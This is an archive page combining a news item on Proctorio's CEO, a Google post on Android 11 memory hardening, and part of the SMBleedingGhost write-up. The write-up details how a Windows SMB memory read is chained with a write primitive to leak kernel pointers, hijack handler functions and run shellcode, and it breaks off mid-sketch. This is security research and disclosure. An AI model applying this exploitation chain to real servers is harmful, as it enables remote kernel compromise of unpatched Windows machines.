Monthly Archives: June 2020

CEO of exam monitoring software Proctorio apologises for posting student’s chat logs on Reddit

Australian students who have raised privacy concerns describe the incident involving a Canadian student as ‘freakishly disrespectful’

The chief executive of an exam monitoring software firm that has raised privacy concerns in Australia has apologised for publicly posting a student’s chat logs during an argument on the website Reddit.

Mike Olsen, who is the CEO of the US-based Proctorio, has since deleted the posts and apologised, saying that he and Proctorio “take privacy very seriously”.


System hardening in Android 11

In Android 11 we continue to increase the security of the Android platform. We have moved to safer default settings, migrated to a hardened memory allocator, and expanded the use of compiler mitigations that defend against classes of vulnerabilities and frustrate exploitation techniques.

Initializing memory

We’ve enabled forms of automatic memory initialization in both Android 11’s userspace and the Linux kernel. Uninitialized memory bugs occur in C/C++ when memory is used without first being initialized to a known safe value. These bugs can be confusing, and even the term “uninitialized” is misleading. Uninitialized may seem to imply that a variable has a random value. In reality it isn’t random: it has whatever value was previously placed there, which may be predictable or even attacker controlled. Unfortunately, this behavior can result in serious vulnerabilities, such as information disclosure bugs (including ASLR bypasses) or control flow hijacking via a stack or heap spray. Another possible side effect of using uninitialized values is that advanced compiler optimizations may transform the code unpredictably, as this is considered undefined behavior by the relevant C standards.

In practice, uses of uninitialized memory are difficult to detect. Such errors may sit in the codebase unnoticed for years if the memory happens to be initialized with some "safe" value most of the time. When uninitialized memory results in a bug, it is often challenging to identify the source of the error, particularly if it is rarely triggered.

Eliminating an entire class of such bugs is a lot more effective than hunting them down individually. Automatic stack variable initialization relies on a feature in the Clang compiler which allows choosing to initialize local variables with either zeros or a pattern.

Initializing to zero provides safer defaults for strings, pointers, indexes, and sizes. The downsides of zero init are less-safe defaults for return values, and exposing fewer bugs where the underlying code relies on zero initialization. Pattern initialization tends to expose more bugs and is generally safer for return values and less safe for strings, pointers, indexes, and sizes.
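
To illustrate the class of bug these modes target, here is a minimal, self-contained C example (illustrative only, not code from the Android tree); the -ftrivial-auto-var-init Clang flag referenced in the comments is the compiler feature this work builds on.

#include <stdio.h>

/* Illustrative example: a classic uninitialized stack variable. Compiled
 * normally, `len` holds whatever happened to be on the stack; built with
 * -ftrivial-auto-var-init=zero it starts at 0, and with
 * -ftrivial-auto-var-init=pattern it starts at a recognizable fill value,
 * which makes the bug easier to spot and harder to exploit. */
static int parse_length(int have_header)
{
    int len;            /* never assigned on the have_header == 0 path */
    if (have_header)
        len = 42;
    return len;         /* may leak stale stack contents */
}

int main(void)
{
    printf("parsed length: %d\n", parse_length(0));
    return 0;
}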

Initializing Userspace:

Automatic stack variable initialization is enabled throughout the entire Android userspace. During the development of Android 11, we initially selected pattern in order to uncover bugs relying on zero init and then moved to zero-init after a few months for increased safety. Platform OS developers can build with `AUTO_PATTERN_INITIALIZE=true m` if they want help uncovering bugs relying on zero init.

Initializing the Kernel:

Automatic stack and heap initialization were recently merged in the upstream Linux kernel. We have made these features available on earlier versions of Android’s kernel including 4.14, 4.19, and 5.4. These features enforce initialization of local variables and heap allocations with known values that cannot be controlled by attackers and are useless when leaked. Both features result in a performance overhead, but they also prevent undefined behavior, improving both stability and security.

For kernel stack initialization we adopted the CONFIG_INIT_STACK_ALL configuration option from upstream Linux. It currently relies on Clang pattern initialization for stack variables, although this is subject to change in the future.

Heap initialization is controlled by two boot-time flags, init_on_alloc and init_on_free, with the former wiping freshly allocated heap objects with zeroes (think s/kmalloc/kzalloc in the whole kernel) and the latter doing the same before the objects are freed (this helps to reduce the lifetime of security-sensitive data). init_on_alloc is a lot more cache-friendly and has smaller performance impact (within 2%), therefore it has been chosen to protect Android kernels.
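
As a rough sketch of the semantics (simplified, not the actual kernel allocator code), the two flags behave as if every heap allocation and free path included the following wipes:

#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Simplified model of the two boot-time flags (not the real mm/ code):
 * init_on_alloc wipes objects as they are handed out, so kmalloc()
 * effectively behaves like kzalloc(); init_on_free wipes them again just
 * before they go back on the freelist, shortening the lifetime of
 * security-sensitive data. */
static void *alloc_hook(void *obj, size_t size, bool init_on_alloc)
{
    if (init_on_alloc && obj)
        memset(obj, 0, size);
    return obj;
}

static void free_hook(void *obj, size_t size, bool init_on_free)
{
    if (init_on_free && obj)
        memset(obj, 0, size);
}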

Scudo is now Android's default native allocator

In Android 11, Scudo replaces jemalloc as the default native allocator for Android. Scudo is a hardened memory allocator designed to help detect and mitigate memory corruption bugs in the heap, such as double frees, arbitrary frees, use-after-frees, and heap-based buffer overflows.

Scudo does not fully prevent exploitation but it does add a number of sanity checks which are effective at strengthening the heap against some memory corruption bugs.
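
For example, a double free is one of the misuse patterns those checks catch; the snippet below (illustrative only, not Scudo code) shows the kind of program Scudo terminates instead of letting it silently corrupt allocator metadata.

#include <stdlib.h>
#include <string.h>

/* Illustrative example: with Scudo as the process allocator, the second
 * free() fails the allocation header checks and the process is aborted. */
int main(void)
{
    char *p = malloc(32);
    if (!p)
        return 1;
    memset(p, 'A', 32);
    free(p);
    free(p);   /* double free: detected by Scudo's header checks */
    return 0;
}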

It also proactively organizes the heap in a way that makes exploitation of memory corruption more difficult, by reducing the predictability of the allocation patterns, and separating allocations by sizes.

In our internal testing, Scudo has already proven its worth by surfacing security and stability bugs that were previously undetected.

Finding Heap Memory Safety Bugs in the Wild (GWP-ASan)

Android 11 introduces GWP-ASan, an in-production heap memory safety bug detection tool that's integrated directly into the native allocator Scudo. GWP-ASan probabilistically detects and provides actionable reports for heap memory safety bugs when they occur, works on 32-bit and 64-bit processes, and is enabled by default for system processes and system apps.

GWP-ASan is also available for developer applications via a one line opt-in in an app's AndroidManifest.xml, with no complicated build support or recompilation of prebuilt libraries necessary.

Software Tag-Based KASAN

Continuing work on adopting the Arm Memory Tagging Extension (MTE) in Android, Android 11 includes support for kernel HWASAN, also known as Software Tag-Based KASAN. Userspace HWASAN has been supported since Android 10.

KernelAddressSANitizer (KASAN) is a dynamic memory error detector designed to find out-of-bounds and use-after-free bugs in the Linux kernel. Its Software Tag-Based mode is a software implementation of the memory tagging concept for the kernel. Software Tag-Based KASAN is available in the 4.14, 4.19 and 5.4 Android kernels, and can be enabled with the CONFIG_KASAN_SW_TAGS kernel configuration option. Currently Tag-Based KASAN only supports tagging of slab memory; support for other types of memory (such as stack and globals) will be added in the future.

Compared to Generic KASAN, Tag-Based KASAN has significantly lower memory requirements (see this kernel commit for details), which makes it usable on dogfood testing devices. Another use case for Software Tag-Based KASAN is checking existing kernel code for compatibility with memory tagging. As Tag-Based KASAN is based on concepts similar to the future in-kernel MTE support, making sure that kernel code works with Tag-Based KASAN will ease in-kernel MTE integration in the future.

Expanding existing compiler mitigations

We’ve continued to expand the compiler mitigations that were rolled out in prior releases as well. This includes adding both integer and bounds sanitizers to some core libraries that were lacking them. For example, the libminikin fonts library and the libui rendering library are now bounds sanitized. We’ve hardened the NFC stack by enabling both the integer overflow sanitizer and the bounds sanitizer in those components.
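
As an illustration of what the integer overflow sanitizer is there to catch (example code, not taken from the NFC stack), consider an allocation-size calculation that silently wraps:

#include <stdint.h>
#include <stdlib.h>

/* Illustrative example: built with -fsanitize=unsigned-integer-overflow
 * (in trapping mode, as used for hardened components), the multiplication
 * below aborts instead of wrapping around and producing an undersized
 * allocation that a later copy would overflow. */
static void *alloc_records(uint32_t count, uint32_t record_size)
{
    uint32_t total = count * record_size;   /* can wrap in 32-bit arithmetic */
    return malloc(total);
}

int main(void)
{
    /* 0x10000 * 0x10000 == 2^32, which wraps to 0 without the sanitizer. */
    void *p = alloc_records(0x10000u, 0x10000u);
    free(p);
    return 0;
}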

In addition to the hard mitigations like sanitizers, we also continue to expand our use of CFI as an exploit mitigation. CFI has been enabled in Android’s networking daemon, DNS resolver, and more of our core JavaScript libraries like libv8 and the PacProcessor.

The effectiveness of our software codec sandbox

Prior to the release of Android 10 we announced a new constrained sandbox for software codecs. We’re really pleased with the results. Thus far, Android 10 is the first Android release since the infamous Stagefright vulnerabilities in Android 5.0 with zero critical-severity vulnerabilities in the media frameworks.

Thank you to Jeff Vander Stoep, Alexander Potapenko, Stephen Hines, Andrey Konovalov, Mitch Phillips, Ivan Lozano, Kostya Kortchinsky, Christopher Ferris, Cindy Zhou, Evgenii Stepanov, Kevin Deus, Peter Collingbourne, Elliott Hughes, Kees Cook and Ken Chen for their contributions to this post.

11 Weeks of Android: Privacy and Security

This blog post is part of a weekly series for #11WeeksOfAndroid. For each week of #11WeeksOfAndroid, we’re diving into a key area so you don’t miss anything. This week, we spotlighted Privacy and Security; here’s a look at what you should know.


Privacy and security is core to how we design Android, and with every new release we increase our investment in this space. Android 11 continues to make important strides in these areas, and this week we’ll be sharing a series of updates and resources about Android privacy and security. But first, let’s take a quick look at some of the most important changes we’ve made in Android 11 to protect user privacy and make the platform more secure.

As shared in the “All things privacy in Android 11” video, we’re giving users even more control over sensitive permissions. Throughout the development of this release, we have engaged deeply and frequently with our developer community to design these features in a balanced way - amplifying user privacy while minimizing developer impact. Let’s go over some of these features:

One-time permission: In Android 10, we introduced a granular location permission that allows users to limit access to location only when an app is in use (aka foreground only). When presented with the new runtime permissions options, users choose foreground only location more than 50% of the time. This demonstrated to us that users really wanted finer controls for permissions. So in Android 11, we’ve introduced one time permissions that let users give an app access to the device microphone, camera, or location, just that one time. As an app developer, there are no changes that you need to make to your app for it to work with one time permissions, and the app can request permissions again the next time the app is used. Learn more about building privacy-friendly apps with these new changes in this video.

Background location: In Android 10 we added a background location usage reminder so users can see how apps are using this sensitive data on a regular basis. Users who interacted with the reminder either downgraded or denied the location permission over 75% of the time. In addition, we have done extensive research and believe that there are very few legitimate use cases for apps to require access to location in the background.

In Android 11, background location will no longer be a permission that a user can grant via a run time prompt and it will require a more deliberate action. If your app needs background location, the system will ensure that the app first asks for foreground location. The app can then broaden its access to background location through a separate permission request, which will cause the system to take the user to Settings in order to complete the permission grant.

In February, we announced that Google Play developers will need to get approval to access background location in their app to prevent misuse. We're giving developers more time to make changes and won't be enforcing the policy for existing apps until 2021. Check out this helpful video to find possible background location usage in your code.

Permissions auto-reset: Most users tend to download and install over 60 apps on their device but interact with only a third of these apps on a regular basis. If users haven’t used an app that targets Android 11 for an extended period of time, the system will “auto-reset” all of the granted runtime permissions associated with the app and notify the user. The app can request the permissions again the next time the app is used. If you have an app that has a legitimate need to retain permissions, you can prompt users to turn this feature OFF for your app in Settings.

Data access auditing APIs: Android encourages developers to limit their access to sensitive data, even if they have been granted permission to do so. In Android 11, developers will have access to new APIs that will give them more transparency into their app’s usage of private and protected data. The APIs will enable apps to track when the system records the app’s access to private user data.

Scoped Storage: In Android 10, we introduced scoped storage which provides a filtered view into external storage, giving access to app-specific files and media collections. This change protects user privacy by limiting broad access to shared storage in many ways including changing the storage permission to only give read access to photos, videos and music and improving app storage attribution. Since Android 10, we’ve incorporated developer feedback and made many improvements to help developers adopt scoped storage, including: updated permission UI to enhance user experience, direct file path access to media to improve compatibility with existing libraries, updated APIs for modifying media, Manage External Storage permission to enable select use cases that need broad files access, and protected external app directories. In Android 11, scoped storage will be mandatory for all apps that target API level 30. Learn more in this video and check out the developer documentation for further details.

Google Play system updates: Google Play system updates were introduced with Android 10 as part of Project Mainline. Their main benefit is to increase the modularity and granularity of platform subsystems within Android so we can update core OS components without needing a full OTA update from your phone manufacturer. Earlier this year, thanks to Project Mainline, we were able to quickly fix a critical vulnerability in the media decoding subsystem. Android 11 adds new modules, and maintains the security properties of existing ones. For example, Conscrypt, which provides cryptographic primitives, maintained its FIPS validation in Android 11 as well.

BiometricPrompt API: Developers can now use the BiometricPrompt API to specify the biometric authenticator strength required by their app to unlock or access sensitive parts of the app. We are planning to add this to the Jetpack Biometric library to allow for backward compatibility and will share further updates on this work as it progresses.

Identity Credential API: This will unlock new use cases such as mobile driver's licenses, National ID, and Digital ID. It’s being built by our security team to ensure this information is stored safely, using security hardware to secure and control access to the data, in a way that enhances user privacy as compared to traditional physical documents. We’re working with various government agencies and industry partners to make sure that Android 11 is ready for such digital-first identity experiences.

Thank you for your flexibility and feedback as we continue to build an increasingly more private and secure platform. You can learn about more features in the Android 11 Beta developer site. You can also learn about general best practices related to privacy and security.

Please follow Android Developers on Twitter and YouTube to catch helpful content and materials in this area all this week.

Resources

You can find the entire playlist of #11WeeksOfAndroid video content here, and learn more about each week here. We’ll continue to spotlight new areas each week, so keep an eye out and follow us on Twitter and YouTube. Thanks so much for letting us be a part of this experience with you!

SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE

Introduction

Previous SMBleedingGhost write-ups: 

In the previous part of the series, SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE, we described two techniques that allow us to read uninitialized memory from the pool buffers allocated by the SrvNetAllocateBuffer function of the srvnet.sys module. The first technique accomplishes that by crafting a special SMB packet and deducing information from the server’s response. The second technique, which has fewer limitations, does that by sending specially crafted compressed data and deducing information depending on whether the server drops the connection.

The next thing we had to understand was: what can be done with this reading ability? As a reminder, we began this research with a write-what-where primitive that we demonstrated in our previous research about achieving local privilege escalation. Since most of the memory layout in modern Windows versions is randomized, we need at least one pointer to be able to do something useful with the write-what-where primitive. Unfortunately, memory allocated with the SrvNetAllocateBuffer function is mostly used for network data such as SMB packets and doesn’t contain system pointers. We could try to read uninitialized memory left by a previous allocation that wasn’t done with SrvNetAllocateBuffer, but it would be difficult to predict where to look for a pointer in this case, especially since we can’t run code on the target computer that could help us groom the pool (unlike in the case of a local privilege escalation, for example). So we started looking for something more reliable.


SrvNetAllocateBuffer and the allocated buffer layout

As we already mentioned in our local privilege escalation research, the SrvNetAllocateBuffer function doesn’t just return a buffer of the requested size. Instead, it returns a pointer to a struct that is located at the bottom of the pool-allocated memory block, containing information about the allocated buffer. The relevant layout for us: the “User buffer” region fills most of the pool-allocated memory block, and the SRVNET_BUFFER_HDR struct that describes it sits at the bottom of the block.

While our reading technique can only read bytes from the “User buffer” region, we can use the integer overflow bug to copy parts of the SRVNET_BUFFER_HDR struct to the “User buffer” region of another buffer, which we can then read. We can do that by setting the Offset field to point at the SRVNET_BUFFER_HDR struct beyond the data we want to read. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.
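
For reference, the Offset field mentioned above is part of the SMB2 compression transform header that precedes compressed payloads. A sketch of its layout, as documented in MS-SMB2, shown for orientation only:

#include <stdint.h>

/* SMB2 COMPRESSION_TRANSFORM_HEADER (per MS-SMB2, sketch). Both SMBGhost and
 * SMBleed stem from OriginalCompressedSegmentSize and Offset taking part in
 * size calculations without sufficient validation; Offset is the number of
 * plain (uncompressed) bytes that precede the compressed payload. */
#pragma pack(push, 1)
typedef struct {
    uint32_t ProtocolId;                    /* 0xFC, 'S', 'M', 'B'           */
    uint32_t OriginalCompressedSegmentSize; /* attacker controlled           */
    uint16_t CompressionAlgorithm;
    uint16_t Flags;
    uint32_t Offset;                        /* Offset/Length in MS-SMB2,
                                               attacker controlled           */
} SMB2_COMPRESSION_TRANSFORM_HEADER;
#pragma pack(pop)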

Hunting for pointers

Let’s take a look at the fields of the SRVNET_BUFFER_HDR struct and see whether there’s something worth reading:

#pragma pack(push, 1)
struct SRVNET_BUFFER_HDR {
/*00*/  LIST_ENTRY ConnectionBufferList;        // orange
/*10*/  WORD BufferFlags; // 0x01 - no transport header, 0x02 - part of a lookaside list
/*12*/  WORD LookasideListIndex; // 0 to 8
/*14*/  WORD LookasideListLogicalProcessor;
/*16*/  WORD TracingDataCount; // 0, 1 or 2, for TracingPtr1/2, TracingUnknown1/2
/*18*/  PBYTE UserBufferPtr;                    // blue
/*20*/  DWORD UserBufferSizeAllocated;
/*24*/  DWORD UserBufferSizeUsed;
/*28*/  DWORD PoolAllocationSize;
/*2C*/  BYTE unknown1[4];
/*30*/  PBYTE PoolAllocationPtr;                // blue
/*38*/  PMDL pMdl1;                             // blue
/*40*/  DWORD BytesProcessed;
/*44*/  BYTE unknown2[4];
/*48*/  SIZE_T BytesReceived;
/*50*/  PMDL pMdl2;                             // blue
/*58*/  PVOID pSrvNetWskStruct;                 // orange
/*60*/  DWORD SmbFlags;
/*64*/  PVOID TracingPtr1;                      // orange
/*6C*/  SIZE_T TracingUnknown1;
/*74*/  PVOID TracingPtr2;                      // orange
/*7C*/  SIZE_T TracingUnknown2;
/*84*/  BYTE unknown3[12];
};
#pragma pack(pop)

The colored variables (marked “orange” and “blue” in the comments above) are pointers. The blue-colored pointers all point inside the pool-allocated memory block, with offsets which can be calculated in advance, so it’s enough to read one of them. Having an absolute pointer to the pool-allocated memory block will surely be helpful. Regarding the orange-colored pointers:

  • ConnectionBufferList – A linked list of all of the received, unhandled buffers of a connection. The list head is a part of the connection object created by the SrvNetAllocateConnection function in srvnet.sys. A buffer is added to the list by the SrvNetWskReceiveComplete function. In our case, there will be only one buffer in the list, so both pointers (Flink and Blink of the LIST_ENTRY struct) will point to the list head inside the connection object.
  • pSrvNetWskStruct – Initially, a pointer to the connection object mentioned above. The pointer is set by the SrvNetWskReceiveEvent function, but is overridden by the SrvNetWskReceiveComplete function with the pointer to the SRVNET_BUFFER_HDR struct. Thus, reading it is not more useful than reading one of the other blue-colored pointers. By the way, if you search for “pSrvNetWskStruct“ you’ll find out that it played a role in exploiting EternalBlue.
  • TracingPtr1/2 – It seems these pointers are only used when tracing is enabled.

As you can see, the only other useful pointer for us to read is one of the pointers from the ConnectionBufferList struct. Both pointers (Blink and Flink of the LIST_ENTRY struct) point to the connection object. The object struct has been named SRVNET_RECV by EternalBlue researchers, so we’ll use this name as well.

Getting a module base address

Now that we know how to get the two pointers – a pointer to a pool-allocated memory block and a pointer to an SRVNET_RECV struct – we can freely modify the two buffers using the write-what-where primitive. There are probably several ways from this point to achieve RCE, but we had a feeling that getting a base address of a module would be the most straightforward option, since there are so many things we can modify in a data section of a module. As we’ve seen, none of the pointers in a memory block allocated by SrvNetAllocateBuffer point to a module. We had hopes for the SRVNET_RECV struct, but we didn’t find pointers that point to a module there either. On the bright side, there are several pointers to modules one additional dereference away: for example, the SRVNET_RECV struct holds a HandlerFunctions pointer to a table of srv2.sys handler functions such as Srv2ReceiveHandler and Srv2DisconnectHandler.

At this point, we noticed that since we can override those pointers in SRVNET_RECV, we can call an arbitrary function by replacing the HandlerFunctions pointer and triggering one of the events, e.g. closing the connection so that Srv2DisconnectHandler is called. This will come in handy later, but we didn’t have any function pointers to call yet, so we continued with our attempt to get a module base address.

Unlike writing, reading those pointers is not as easy since our technique allows us to read only from the “User buffer” region. So close, yet so far. Since we can get and modify a pool-allocated memory block and an SRVNET_RECV struct, we hoped to find code that we can trigger that does a double-dereference-read followed by a double-dereference-write with two variables that we control, similar to the following:

ptr1 = *(pSrvNetRecv + offset1)
value = *ptr1
ptr2 = *(pSrvNetRecv + offset2)
*ptr2 = value

If we could find such a snippet, we would trigger it to copy the first pointer (e.g. HandlerFunctions) to the “User buffer” region, read it, then copy the second pointer (e.g. the Srv2ConnectHandler function pointer) to the “User buffer” region and read it as well, deducing the module base address from it. We searched for such a snippet for a long time, but didn’t find a good match. Finally, we settled on a sub-optimal option which nevertheless worked. Let’s take a look at the relevant part of the SrvNetFreeBuffer function (simplified):

void SrvNetFreeBuffer(PSRVNET_BUFFER_HDR Buffer)
{
    PMDL pMdl1 = Buffer->pMdl1;
    PMDL pMdl2 = Buffer->pMdl2;

    if (pMdl2->MdlFlags & 0x0020) {
        // MDL_PARTIAL_HAS_BEEN_MAPPED flag is set.
        MmUnmapLockedPages(pMdl2->MappedSystemVa, pMdl2);
    }

    if (Buffer->BufferFlags & 0x02) {
        if (Buffer->BufferFlags & 0x01) {
            pMdl1->MappedSystemVa = (BYTE*)pMdl1->MappedSystemVa + 0x50;
            pMdl1->ByteCount -= 0x50;
            pMdl1->ByteOffset += 0x50;
            pMdl1->MdlFlags |= 0x1000; // MDL_NETWORK_HEADER

            pMdl2->StartVa = (PVOID)((ULONG_PTR)pMdl1->MappedSystemVa & ~0xFFF);
            pMdl2->ByteCount = pMdl1->ByteCount;
            pMdl2->ByteOffset = (ULONG_PTR)pMdl1->MappedSystemVa & 0xFFF;
            pMdl2->Size = /* some calculation */;
            pMdl2->MdlFlags = 0x0004; // MDL_SOURCE_IS_NONPAGED_POOL
        }

        Buffer->BufferFlags = 0;

        // ...

        pMdl1->Next = NULL;
        pMdl2->Next = NULL;

        // Return the buffer to the lookaside list.
    } else {
        SrvNetUpdateMemStatistics(NonPagedPoolNx, Buffer->PoolAllocationSize, FALSE);
        ExFreePoolWithTag(Buffer->PoolAllocationPtr, '00SL');
    }
}

Upon freeing the buffer, if buffer flags 0x02 (meaning the buffer is part of a lookaside list) and 0x01 (meaning the buffer has no transport header) are set, some operations are performed on the two MDL objects to add the transport header before resetting the flags to zero and returning the buffer to the lookaside list. If we set aside the meaning behind the operations on the MDL objects for a moment and look at them purely in terms of memory manipulation, we can notice that the code does a double-dereference-read followed by a double-dereference-write with two variables that we control (the two MDL pointers), which is what we were looking for. The downside is that the content that we want to read from is also modified (the writes through pMdl1 to its MappedSystemVa, ByteCount, ByteOffset, MdlFlags and Next fields), a side effect we hoped to avoid.
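
For orientation, here are the MDL fields the code above touches, with their x64 offsets (a sketch based on the wdm.h definition, not srvnet code); the 0x18 offset of MappedSystemVa is the one referenced in the steps below.

#include <stdint.h>

/* MDL field layout on x64 (sketch of the wdm.h struct; offsets in comments).
 * MappedSystemVa sits at offset 0x18, which is why a crafted MDL pointer is
 * placed 0x18 bytes before the value we want the code above to read from or
 * write to. */
typedef struct _MDL_SKETCH {
/*00*/  struct _MDL_SKETCH *Next;
/*08*/  int16_t             Size;
/*0A*/  int16_t             MdlFlags;
/*10*/  void               *Process;         /* owning EPROCESS          */
/*18*/  void               *MappedSystemVa;  /* read and written above   */
/*20*/  void               *StartVa;
/*28*/  uint32_t            ByteCount;
/*2C*/  uint32_t            ByteOffset;
} MDL_SKETCH;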

Given the above, here’s how we managed to read the AcceptSocket pointer:

1. Prepare buffer A from a lookaside list such that the “User buffer” region is filled with zeros. This buffer will end up holding the pointer that we’ll eventually read.

2. Prepare buffer B from a different lookaside list such that:

  • The pMdl1 pointer points at the address of the HandlerFunctions pointer minus 0x18, the offset of MappedSystemVa in the MDL struct.
  • The pMdl2 pointer points at the “User buffer” region of Buffer A.
  • The BufferFlags field is set to 0x03.

We can override the SRVNET_BUFFER_HDR struct fields by decompressing them from a larger buffer using the technique described in the Observation #2 section of the previous part of the writeup.

3. When buffer B is freed, the following operations will take place:

  • The MDL flags will be read from the second MDL at buffer A. If the MDL_PARTIAL_HAS_BEEN_MAPPED flag is set, MmUnmapLockedPages will be called and the system will likely crash. That’s why we filled the buffer with zeros in step 1.
  • The HandlerFunctions pointer and the memory around it will be modified as depicted here:
+00 |  00 00 00 00 00 00 00 00
+08 |  __ __ __|10 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  [+50..................]  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  [-50......] [+50......]
  • The HandlerFunctions pointer and the memory around it will be read as depicted here:
+00 |  __ __ __ __ __ __ __ __
+08 |  __ __ __ __ __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  ab cd ef gh ij kl mn op  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  qr st uv wx __ __ __ __
  • The “User buffer” region of buffer A will be modified as depicted here: (The orange-colored bytes contain the pointer we want to read. We just need to order them properly.)
+00 |  00 00 00 00 00 00 00 00
+08 |  ?? ?? 04 00 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  __ __ __ __ __ __ __ __
+20 |  00 {c}0 {ef gh ij kl mn op}
+28 |  qr st uv wx {ab} 0{d} 00 00

4. Read the AcceptSocket pointer from the “User buffer” region of buffer A.

The good news: we managed to read the pointer. The bad news: we corrupted some data in the SRVNET_RECV struct. Luckily for us, the corruption doesn’t affect the system as long as nothing happens with the relevant connection. When something does happen, e.g. the connection closes, the system crashes. That’s not a problem since we’ll get RCE soon, and we can fix the corruption if we want to. We didn’t implement such a fix in our POC; it is left as an exercise for the reader.

After reading the AcceptSocket pointer, we used the same technique to read the srvnet!SrvNetWskConnDispatch pointer. We read the AcceptSocket pointer and not the HandlerFunctions pointer since the array of handler functions is shared between all connections, while the buffer pointed to by AcceptSocket is not shared with other connections. Therefore, we can corrupt the latter, affecting the stability of only a single connection.

If we have a copy of the srvnet.sys file used on the target computer, we can just compute the offset of the SrvNetWskConnDispatch pointer in the module locally and subtract the offset from the pointer we read, getting the srvnet.sys module base address as a result. That’s what we did in our POC to keep things simple. One can improve it to be more general. One option that comes to mind is keeping several versions of srvnet.sys locally, and deducing the correct one by the least significant bytes of the read pointer.
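
The base address recovery itself is plain pointer arithmetic; a minimal sketch, with a placeholder offset (the real value is build-specific and taken from the local copy of srvnet.sys):

#include <stdint.h>

/* Sketch: recover the srvnet.sys base from the leaked SrvNetWskConnDispatch
 * pointer. The RVA below is a hypothetical placeholder; in practice it is
 * read from a local copy of the same srvnet.sys build as the target. */
#define SRVNET_WSK_CONN_DISPATCH_RVA 0x12345ULL /* placeholder, build-specific */

static uint64_t srvnet_base_from_leak(uint64_t leaked_dispatch_ptr)
{
    return leaked_dispatch_ptr - SRVNET_WSK_CONN_DISPATCH_RVA;
}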

Implementing arbitrary read

From the beginning of this research we had a convenient write-what-where (arbitrary write) primitive, but had nothing that allowed us to read memory. We worked hard until now to gain some memory reading abilities, and at this point we felt that we had enough tools to make our life easier and implement a convenient arbitrary read primitive. We began by exploring the possibilities of calling an arbitrary function.

Given that we have the base address of the srvnet.sys module, we can call any of the module’s functions. But what about the function’s arguments? The srv2!Srv2ReceiveHandler function is called by SrvNetCommonReceiveHandler, and the call looks like this:

HandlerFunctions = *(pSrvNetRecv + 0x118);
Arg1 = *(pSrvNetRecv + 0x128);
Arg2 = *(pSrvNetRecv + 0x130);
(HandlerFunctions[1])(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8);

The first two arguments are read from the SRVNET_RECV struct, so we can control them. We don’t have as much control over the other arguments. The x86-64 calling convention specifies that it’s the caller’s responsibility to allocate and free the stack space for the arguments, so even though an 8-argument function is intended to be called, we can replace the pointer with a function that expects any other number of arguments, and it will work.

Here are the steps we used to trigger the function call:

  1. Send a specially crafted message so that the connection’s SRVNET_RECV struct pointer will be copied to a buffer we can read.
  2. Send another, valid message, which will reuse the same SRVNET_RECV struct, but don’t close the connection yet. Note that when a connection is closed, the SRVNET_RECV struct is not freed. The SrvNetPrepareConnectionForReuse function is called to reset the struct so that it can be reused for the next connection.
  3. Read the SRVNET_RECV struct pointer that we copied in step 1.
  4. Replace the HandlerFunctions pointer and the arguments using the write-what-where primitive.
  5. Send an additional message over the connection from step 2 so that the function that took the place of srv2!Srv2ReceiveHandler is called.

Now all we had to do was find a convenient function to copy memory from one location to another, so that we can copy arbitrary memory to the pool buffer we can read from. memcpy comes to mind, and srvnet.sys does have such a function (memmove, to be precise), but this function requires a third argument, the number of bytes to be copied, which we don’t control. Failing to find a convenient function that requires only one or two arguments, we realized that we’re not limited to functions implemented in srvnet.sys; we can also call functions from srvnet’s import table by pointing HandlerFunctions at the right offset. There, we found the perfect function: RtlCopyUnicodeString.

The RtlCopyUnicodeString function takes two UNICODE_STRING pointers as arguments and copies the content of the source string to the destination string. Unlike C strings, which are NULL-terminated, strings in the kernel are defined by the UNICODE_STRING struct, which holds a pointer to the string and the string’s length in bytes. The string buffer can hold any binary data. If you peek at the implementation of RtlCopyUnicodeString, you can see that the copying is done with the memmove function, i.e. plain binary data copying. All we have to do is prepare our two UNICODE_STRING structs, call RtlCopyUnicodeString, and then read the copied data.
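
Here’s a sketch of the two descriptors we stage for the copy (field layout per ntdef.h; the buffer addresses are placeholders, not the POC’s actual values):

#include <stdint.h>

/* UNICODE_STRING layout (per ntdef.h). RtlCopyUnicodeString(&Dst, &Src)
 * memmove()s min(Src.Length, Dst.MaximumLength) bytes from Src.Buffer to
 * Dst.Buffer and updates Dst.Length, so it works as a bounded binary copy. */
typedef struct _UNICODE_STRING_SKETCH {
    uint16_t Length;        /* bytes of data in Buffer        */
    uint16_t MaximumLength; /* capacity of Buffer in bytes    */
    wchar_t *Buffer;        /* may hold arbitrary binary data */
} UNICODE_STRING_SKETCH;

/* Source descriptor: Buffer points at the kernel address we want to read
 * (placeholder address). */
static UNICODE_STRING_SKETCH Src = { 8, 8, (wchar_t *)0xFFFFF78000000000ULL };

/* Destination descriptor: Buffer points into a lookaside pool buffer whose
 * contents we can later read back with the SMBleed technique (placeholder). */
static UNICODE_STRING_SKETCH Dst = { 0, 0x100, (wchar_t *)0xFFFFB10000000000ULL };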

Executing shellcode

After achieving a convenient arbitrary read primitive, we moved on to the next challenge towards our goal of remote code execution: running a shellcode. We used the technique that Morten Schenk presented in his Black Hat USA 2017 talk (pages 47-51).

The idea is to write the shellcode below the KUSER_SHARED_DATA structure, which is located at a constant address, the only address that is not randomized in the kernel memory layout of recent Windows versions, and then modify the relevant page table entry to make the page executable. The base address of the page table entries in the kernel is randomized, but can be retrieved from the MiGetPteAddress function in ntoskrnl.exe. Here are the steps we used to execute our shellcode (a sketch of the address math follows the list):

  1. Use our arbitrary read primitive to get the base address of ntoskrnl.exe from srvnet’s import table.
  2. Read the base address of the page table entries from the MiGetPteAddress function, as described in Morten’s slides.
  3. Write the shellcode at address KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800). Note that we could also use one of the pool buffers, using KUSER_SHARED_DATA is just more convenient.
  4. Calculate the relevant page table entry address and clear the NX bit to allow execution, as described in Morten’s slides.
  5. Call the shellcode using our ability to call an arbitrary function.
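
A sketch of the address math behind steps 2 and 4 (assuming the usual x64 page-table self-map that MiGetPteAddress encodes; pte_base is the randomized value recovered in step 2):

#include <stdint.h>

/* Sketch of the PTE math used above (assumption: the standard x64 self-map
 * layout that MiGetPteAddress implements). */
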